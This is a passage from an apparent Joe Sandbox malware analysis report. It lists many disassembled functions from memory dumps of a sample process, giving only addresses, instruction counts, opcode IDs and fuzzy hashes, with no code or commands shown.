                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 242e638f661ee545c2179ca84e5076d68f3eee4f35f5672bfc4bb58a0bb833c6
                                      • Instruction ID: 5094875bbc6e8d0d70b1c88b2659d2c8693863f8509f7ccda41eea5f21370187
                                      • Opcode Fuzzy Hash: 242e638f661ee545c2179ca84e5076d68f3eee4f35f5672bfc4bb58a0bb833c6
                                      • Instruction Fuzzy Hash: F5E0C930A1421C8FCB55DF68D8997ADBB71FB8A301F1011D6A04AA3745DF305984CF05
                                      Function 0571B62E Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8
                                      • API String ID: 0-4194326291
                                      • Opcode ID: 3de9288921f8843777810a1af06198140fbd3bbe59585348065115d4bb3925a3
                                      • Instruction ID: 372f346423341d671b21e30b2d37adefd1ff3e6b57f934b5d9b9f2d63aee14c0
                                      • Opcode Fuzzy Hash: 3de9288921f8843777810a1af06198140fbd3bbe59585348065115d4bb3925a3
                                      • Instruction Fuzzy Hash: C5F0FFB89022288FDBA4DF24DD48799BBB2BB88210F5182E9E40DA3350DF311E95DF01
                                      Function 057F0271 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: ceb9df7bfea561607a095f91b32b57308f27c204339e604abe4bb32d99adb088
                                      • Instruction ID: 23d289b48573423a998a043da74029b4f9b0f549cce302bb06e2c0f8636ef423
                                      • Opcode Fuzzy Hash: ceb9df7bfea561607a095f91b32b57308f27c204339e604abe4bb32d99adb088
                                      • Instruction Fuzzy Hash: A6E0E530A01218CBEB58DF28D895BADBBB1FB4A311F1042D9E50AA3345CF305E84CF25
                                      Function 057F0B33 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 2eb3b00fed465363611b87603a93b0c6fab223b8ebe39f9e3bbfa488e8a31c38
                                      • Instruction ID: 013989e01cad2fc9e81ec9b2f24ceb1fb5b903155700a58fad7dca186fb6d340
                                      • Opcode Fuzzy Hash: 2eb3b00fed465363611b87603a93b0c6fab223b8ebe39f9e3bbfa488e8a31c38
                                      • Instruction Fuzzy Hash: B9E01230500258CBD754DF24E8497ADBB75FB56310F508595A54BB3745CB311E81CF11
                                      Function 057F0B89 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 2290a41d1241404d6de5bc2061f44e2284c6d09f9f3f715d3ca1efc430cf3800
                                      • Instruction ID: 4019516cf6da849acd67482ec1c8eded4249746d700de25d9b3456f4d8dbd541
                                      • Opcode Fuzzy Hash: 2290a41d1241404d6de5bc2061f44e2284c6d09f9f3f715d3ca1efc430cf3800
                                      • Instruction Fuzzy Hash: 13E01A38A04318CFDB29DF24D854BADBBB1FB4A300F9040A9A24AA3745CF301E84CF16
                                      Function 057F0A4B Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: d7b4452844ec53bddf188b4e3868e3885eb6a51d9d9e79393dc01d688c152623
                                      • Instruction ID: d9c330afde919d7d72f4f88069639d738b2e3391200737abccba5cb1639bbe01
                                      • Opcode Fuzzy Hash: d7b4452844ec53bddf188b4e3868e3885eb6a51d9d9e79393dc01d688c152623
                                      • Instruction Fuzzy Hash: B1E0E530D10218CBDB14EF68E85979EBAB2FB8A310F108098E54AA3745DA301E84CF15
                                      Function 057122C0 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: z
                                      • API String ID: 0-1657960367
                                      • Opcode ID: 3d313a170adce1c290074f7c49e04041be0efc8e285450e07cfe691ba633a952
                                      • Instruction ID: 652a2bd2fb85570d99ea006d6fdf8560617ab85d000a1081ad4a72894514c22a
                                      • Opcode Fuzzy Hash: 3d313a170adce1c290074f7c49e04041be0efc8e285450e07cfe691ba633a952
                                      • Instruction Fuzzy Hash: 78D09E74E14228DFCB55CF54D88478DB7B5AF46304F5012DA994877214CB746EC18F4A
                                      Function 05838A06 Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790871087.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5830000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: ede8b6e17ba6ba7c1c2889d073397c53d674963d6d9546a8b93fa34a794c340b
                                      • Instruction ID: e48606573cc5f827a7e1b49ca6dbae5eea8bccaa5b00c9def306337e39c8e500
                                      • Opcode Fuzzy Hash: ede8b6e17ba6ba7c1c2889d073397c53d674963d6d9546a8b93fa34a794c340b
                                      • Instruction Fuzzy Hash: DDC08C302022088FE344EB54D02922EBE63F757344F505028B302B6688CF300E498B4A
                                      Function 057F0B0A Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (vv
                                      • API String ID: 0-152880179
                                      • Opcode ID: 0b5bbfa43d11f1624deabccdccdc0090de9def7d9f23e570ea5cce238d96c4d4
                                      • Instruction ID: 8240b53fc1a317d4e40dc6c63f27a3a5c91aa9b048ae08612009d58d8b48b810
                                      • Opcode Fuzzy Hash: 0b5bbfa43d11f1624deabccdccdc0090de9def7d9f23e570ea5cce238d96c4d4
                                      • Instruction Fuzzy Hash: 3BC08C30200148CBE304EF64D08C67D7E62F752309F10402862037A389CF3008448716
                                      Function 057FE9C0 Relevance: .7, Instructions: 677COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a895f2ae66035c768866910881f8564343465609db6618cd47af05470c463cb
                                      • Instruction ID: e8e069f01c62d7f60cf0ef48b9d7ae2459e0dd971f09946445866a4ad7a88a9c
                                      • Opcode Fuzzy Hash: 1a895f2ae66035c768866910881f8564343465609db6618cd47af05470c463cb
                                      • Instruction Fuzzy Hash: E552EB75A002288FDB64DF69C985BEDBBF6BF88300F1541D9E609A7351DA309E81CF61
                                      Function 05641EA8 Relevance: .6, Instructions: 577COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2789766810.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5640000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 223be9a29c2ffaa484debec9cf368eda176bda91aae0656f8be8fda533e838bb
                                      • Instruction ID: 87a00fff47315008f9aa8828eeca7618da180945bf62e0bab6935992adf6d85d
                                      • Opcode Fuzzy Hash: 223be9a29c2ffaa484debec9cf368eda176bda91aae0656f8be8fda533e838bb
                                      • Instruction Fuzzy Hash: F342B138E44209CFDB14DFA9C4A8ABEBBB2FF49311F609119E912A7750DB345982CF51
                                      Function 057F8F20 Relevance: .5, Instructions: 531COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cbea981e9501d6a6bc9b72d828093a5144bd2ad330e508226c3bfc3a67e656ca
                                      • Instruction ID: 35ea841b6a70d88098222b6edc94eeddb40c221c20ccc58ab62b78f82af4d5af
                                      • Opcode Fuzzy Hash: cbea981e9501d6a6bc9b72d828093a5144bd2ad330e508226c3bfc3a67e656ca
                                      • Instruction Fuzzy Hash: B9227E35A102089FDB14DF69D495BADB7B2FF88310F148069EA06EB3A5DB71ED41CB90
                                      Function 057F8338 Relevance: .5, Instructions: 518COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 39a62509ea74306aa83e741bd73e3b090368f940ee995c1e1fdeaa55c55559a1
                                      • Instruction ID: efa08ae26cbce9536470c86e56bd9b317caa187df880b369939b86d2a95520f7
                                      • Opcode Fuzzy Hash: 39a62509ea74306aa83e741bd73e3b090368f940ee995c1e1fdeaa55c55559a1
                                      • Instruction Fuzzy Hash: BB228A30E00229DFCB05DFA5D854AADBBF2FF48311F148115E902AB3A4DB749A46DF92
                                      Function 05642EB8 Relevance: .5, Instructions: 488COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2789766810.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5640000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de85d153d70297fccfa1de63d5b7d2e70535a5a80944181a749fab5a80a5ebde
                                      • Instruction ID: 9068e61431a6539944f65bddd6ede00338283906e09cc64194615db1f48a8d69
                                      • Opcode Fuzzy Hash: de85d153d70297fccfa1de63d5b7d2e70535a5a80944181a749fab5a80a5ebde
                                      • Instruction Fuzzy Hash: A132BD34A01318CFDB64DFA8C558AADBBB2FF49306F609469E406AB354DB385E85CF41
                                      Function 057FBE30 Relevance: .5, Instructions: 475COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ca0d7bd5a4472b9679b695ddd7003644ef1ba1b1dc5cb4517419a27114b383b9
                                      • Instruction ID: b35226b9ce0066639e2fe84e6b9b8b3b16842b3efea7e55b4af077a133df6213
                                      • Opcode Fuzzy Hash: ca0d7bd5a4472b9679b695ddd7003644ef1ba1b1dc5cb4517419a27114b383b9
                                      • Instruction Fuzzy Hash: AC127E30A042088FDB15DFA9C884A6EBBF6FF88300F14852DE6069B791DB35ED45DB91
                                      Function 057FDAE8 Relevance: .4, Instructions: 370COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb3fb53090e8445c34cf951b5d2862a48d9d943c3ce140639dc0173c219a8ebb
                                      • Instruction ID: 1457664f99b7cf2e147877a07fa24760961dca7e4126aa9a672e04ed5ecca349
                                      • Opcode Fuzzy Hash: bb3fb53090e8445c34cf951b5d2862a48d9d943c3ce140639dc0173c219a8ebb
                                      • Instruction Fuzzy Hash: 75F1B574A10218DFCB14DFA4D998E9DBBB2FF89300F118159E906AB3A5DB71EC42DB50
                                      Function 057F4AA8 Relevance: .2, Instructions: 246COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b4e6dd3419253d8e764b276ccbda75c2ed7a2035624a285e8f81f061d55eb4e
                                      • Instruction ID: 459941472080e01d7a8bac2e3d72bbad00c2947e2d8b5cf38e554b3181095f9a
                                      • Opcode Fuzzy Hash: 5b4e6dd3419253d8e764b276ccbda75c2ed7a2035624a285e8f81f061d55eb4e
                                      • Instruction Fuzzy Hash: AF918A35B012189FCB14DFA9D989AAEBBF2FF88311F108069EA129B351CB35DD41DB50
                                      Function 057F9690 Relevance: .2, Instructions: 238COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b10732e76feacf8dc5b38afd4b415944435164405ea136a115f9e2214f6a107e
                                      • Instruction ID: 766ecc2c87b6f3a767984baf4041db2934fc8d87a7ac8b143088ffef7faffca9
                                      • Opcode Fuzzy Hash: b10732e76feacf8dc5b38afd4b415944435164405ea136a115f9e2214f6a107e
                                      • Instruction Fuzzy Hash: A191F534B002148FDB14EF69C494A6A7BF6BF89710F1141A9E606DB3A5DB71EC41CBA1
                                      Function 056426A8 Relevance: .2, Instructions: 231COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2789766810.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5640000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8db146795cdefc9fdaecc7cea7021b92cb5b572cb139ef8ce53ea53e9497671d
                                      • Instruction ID: eb4f6183a2acc8dcc2e49f1d74e3924fde498a6c5c9ca2f77c2d49ebfb6cb0cb
                                      • Opcode Fuzzy Hash: 8db146795cdefc9fdaecc7cea7021b92cb5b572cb139ef8ce53ea53e9497671d
                                      • Instruction Fuzzy Hash: 6EA1C578E0120DDFDB18DFA5D4686AEBBB2FF89311F609029E812A7750CB345986CF51
                                      Function 057FDAD8 Relevance: .2, Instructions: 223COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 77f214f1c4bfe5d44bdf9547ec1d66766662b1f788c6ea980fd629202764b545
                                      • Instruction ID: afdd58ce00fa498318936f68e59d0745e3254f65fcae2e852f33aa82069d70ad
                                      • Opcode Fuzzy Hash: 77f214f1c4bfe5d44bdf9547ec1d66766662b1f788c6ea980fd629202764b545
                                      • Instruction Fuzzy Hash: 92A1E834B10218DFCB14EFA4D898E9DBBB6FF89300F158159E506AB365DB70AD42DB90
                                      Function 00995396 Relevance: .2, Instructions: 222COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2772830333.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_990000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1149a23fed5b546e4a43832f516fcb3b57e54f6558984d36fa4af7f0c90fee72
                                      • Instruction ID: f2f20c3e71fe4250ac608fc221ef5b15a822b25cb7c7d3505d91a79a2defb195
                                      • Opcode Fuzzy Hash: 1149a23fed5b546e4a43832f516fcb3b57e54f6558984d36fa4af7f0c90fee72
                                      • Instruction Fuzzy Hash: 51C1C0B4904628CFDB619F28DC887D9BBB4BB49305F5055E9E60EA3291CB751EC4CF09
                                      Function 057FA3F0 Relevance: .2, Instructions: 208COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d0693658d9d84227bf93d8d9855626f47577673a9246649b639933e7a2305c5
                                      • Instruction ID: bf35d3ef70fb44a68506c2466a2219125c78c4d574797d9e8dd1f24435b5e9e8
                                      • Opcode Fuzzy Hash: 2d0693658d9d84227bf93d8d9855626f47577673a9246649b639933e7a2305c5
                                      • Instruction Fuzzy Hash: DC81F635A00618CFCB14DF69C494DAEBBF6FF48710B1585A9E91A9B360DB30ED42CB90
                                      Function 057F4730 Relevance: .2, Instructions: 181COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a71f6e7a3001c32770692360d06026f66a00af5a78d20d751349e3a7ea24a0c3
                                      • Instruction ID: 0d1644cc5e3ed80145573d2eaed0a535dc0c322aa43fe24f93b891a399aa1a34
                                      • Opcode Fuzzy Hash: a71f6e7a3001c32770692360d06026f66a00af5a78d20d751349e3a7ea24a0c3
                                      • Instruction Fuzzy Hash: 4A51C135B006159FCF10DF68D884AAAFBB2FF8A320F558165E6169B341DB30E852DBD0
                                      Function 057F9F11 Relevance: .2, Instructions: 179COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d30c20efd0c7efe2960d2325240ac40071709fef2a9b424a1bc523b5770fa57
                                      • Instruction ID: 4338885c2f29dab4bf7d5d964074346b2b5856e79dba98a3fe96b9a49f751983
                                      • Opcode Fuzzy Hash: 9d30c20efd0c7efe2960d2325240ac40071709fef2a9b424a1bc523b5770fa57
                                      • Instruction Fuzzy Hash: 2C5198313002058FEB18DF69D894BAE7BA6FF84314F108469EA06CB3A1DB35DD12CB91
                                      Function 057F7970 Relevance: .2, Instructions: 173COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7dd012389299ce6784b3c181f5f2af80d83d66f7f73cbe1fd7a06528339bddf8
                                      • Instruction ID: df15d47975740ecd31a212e7f2d70ddeedc165e587c0d4fc602005d37183d540
                                      • Opcode Fuzzy Hash: 7dd012389299ce6784b3c181f5f2af80d83d66f7f73cbe1fd7a06528339bddf8
                                      • Instruction Fuzzy Hash: D9516A347002058FE769EFB8C454A2E7BB3FF85211B55846DEA069B3A1DE35DD02CB91
                                      Function 057F5610 Relevance: .2, Instructions: 157COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee33fc27ba245eb74515656a9d15a683722b2bc81c56cbe377c39e037828d2ff
                                      • Instruction ID: 370d656a0a14bade2d9e59003f53beec2f497568e86537a141e42db71ffa2af7
                                      • Opcode Fuzzy Hash: ee33fc27ba245eb74515656a9d15a683722b2bc81c56cbe377c39e037828d2ff
                                      • Instruction Fuzzy Hash: E0517A357001148FDB14DF69D894AAEBBA2FF89750F158169EA06DB361DB31EC018BA1
                                      Function 057F3778 Relevance: .1, Instructions: 149COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5a1b33ff8649115ca663d3326ee57bf5e92421422e96aa3123c638942e2a2e67
                                      • Instruction ID: e9666e7a195310029c29a93978712061cc9caec09e96d96b2f417b1223ac45e9
                                      • Opcode Fuzzy Hash: 5a1b33ff8649115ca663d3326ee57bf5e92421422e96aa3123c638942e2a2e67
                                      • Instruction Fuzzy Hash: 75514B76600100AFCB469FA8C945D2ABBF6FF8D31471684D9E2099B376CA32DC21EB51
                                      Function 057FD6B8 Relevance: .1, Instructions: 143COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f05d50dd711e7f837614b0f5a07ac9d75a1b685366ef498940b72b6b927fef08
                                      • Instruction ID: b726a91b1db1545a75777c5ff01cff30daa2c67f0f7a3f240c504009f219a7dd
                                      • Opcode Fuzzy Hash: f05d50dd711e7f837614b0f5a07ac9d75a1b685366ef498940b72b6b927fef08
                                      • Instruction Fuzzy Hash: AA516C34B506099FCB04EF64E458AADBBBAFF88711F008159E5029B360DF359D46CB91
                                      Function 057F417F Relevance: .1, Instructions: 139COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c56e17293397e7798d10f5ed3118a3ea3f84f74e152e6a6a757b27a52f2030b1
                                      • Instruction ID: c1c24457d5aea669add5bde7228bc8a25ba3c6908a4a4e1b06268dfd2b6bd8a7
                                      • Opcode Fuzzy Hash: c56e17293397e7798d10f5ed3118a3ea3f84f74e152e6a6a757b27a52f2030b1
                                      • Instruction Fuzzy Hash: B851AE31204B018FE724DF7AC444B5BBBE2EF85320F10C629D65A8BB91DB38D905CB92
                                      Function 057174B0 Relevance: .1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e3faa25118be69dd9a74588978a94ddb86ab404233f298150dea6930a26493f7
                                      • Instruction ID: 84ad0c0a16411327e69d591b91cc9b9bc433aa63333020de0c1c1be10708fb75
                                      • Opcode Fuzzy Hash: e3faa25118be69dd9a74588978a94ddb86ab404233f298150dea6930a26493f7
                                      • Instruction Fuzzy Hash: F151A570D01208DFDB58DFA9D994AADBBF2FF89305F20852AD816AB360DB319941CF54
                                      Function 0571FBB8 Relevance: .1, Instructions: 109COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5d7ac26c655c985d6b1d2ea6261e25db04a26a829fbdd420e459d9bb4fc1fd42
                                      • Instruction ID: 51d77a5e6f72e588c3b7077435480bc558b3a48277a25d1fec1dab6acdce0f4c
                                      • Opcode Fuzzy Hash: 5d7ac26c655c985d6b1d2ea6261e25db04a26a829fbdd420e459d9bb4fc1fd42
                                      • Instruction Fuzzy Hash: 7F314D753406149FD308DB69C858F2BB7EAAFC8710F104468EA068B3A5DE75EC02CBA5
                                      Function 057174A0 Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790402152.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5710000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ac3745390bdf54fb345ea55c14ecd19a62e90a876f4c52faab3020960f690e98
                                      • Instruction ID: afc252722697d438186381d629ce19f5240944e7982fc99eb2f9d13dcc1485fd
                                      • Opcode Fuzzy Hash: ac3745390bdf54fb345ea55c14ecd19a62e90a876f4c52faab3020960f690e98
                                      • Instruction Fuzzy Hash: B041B470D01208DFDB58DFBAD894AADBBB2FF89304F24852AD815AB360DB319941CF54
                                      Function 057F5358 Relevance: .1, Instructions: 101COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2790571883.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_57f0000_DisplayName.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 693061ec8f4d3183ad7267e7d4e00a7bd5acd4890e22ec12eafeca2d9850062f
                                      • Instruction ID: 606c7e27f991c8b7e09f14f74e0bd30e55897af3a337d002ec307d4e1c5ab95a
                                      • Opcode Fuzzy Hash: 693061ec8f4d3183ad7267e7d4e00a7bd5acd4890e22ec12eafeca2d9850062f
                                      • Instruction Fuzzy Hash: 56418D31A0021A8FDB14CFA5D844ABEBBF1FF84351F10852AEA16E7390D734D945DB91
                                      Function 057F4028 Relevance: .1, Instructions: 94COMMON
